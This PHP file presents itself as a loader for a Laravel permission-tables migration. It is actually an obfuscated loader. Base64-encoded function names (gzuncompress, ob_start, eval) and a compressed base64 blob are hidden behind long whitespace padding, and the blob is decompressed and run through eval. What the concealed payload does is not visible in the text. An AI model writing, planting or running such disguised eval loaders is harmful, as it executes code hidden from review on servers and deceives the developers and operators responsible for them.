<?php 
        $__='printf';$_='Loading database/migrations/2022_04_21_113600_create_permission_tables.php';
        











































































































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































































































































































                                                                                                                                                                                                                     $________;
